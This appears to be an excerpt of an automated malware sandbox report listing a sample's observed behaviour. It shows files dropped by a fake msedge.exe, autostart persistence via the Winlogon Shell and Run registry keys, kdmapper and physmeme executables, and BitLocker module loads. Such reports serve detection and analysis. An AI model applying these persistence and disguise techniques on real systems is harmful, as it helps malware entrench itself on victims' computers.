Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\WpXNITDI.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\iacMOeMk.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\XmyVeTRC.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\GfhqKgmo.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\EVLpKOHn.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\VPYFfuwr.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\NKJXVMBv.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\wDtsBZWh.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\TUtPMNAm.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\JlazcluE.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\rWRTdVVu.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\MQUzRRxE.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\zrKsasrd.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\fZXNGngO.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\VltWWbmg.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\NhvHKDkY.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\DqsZwsEl.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\uIZJMPyD.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\eGTFsMJp.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\UXzpIjDH.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Edge\msedge.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell			Jump to behavior
Source: C:\Edge\msedge.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell			Jump to behavior

Creates multiple autostart registry keys

Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge			Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wCnmgKwwXYQbWeNvWeCCOp			Jump to behavior

Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wCnmgKwwXYQbWeNvWeCCOp	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wCnmgKwwXYQbWeNvWeCCOp	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
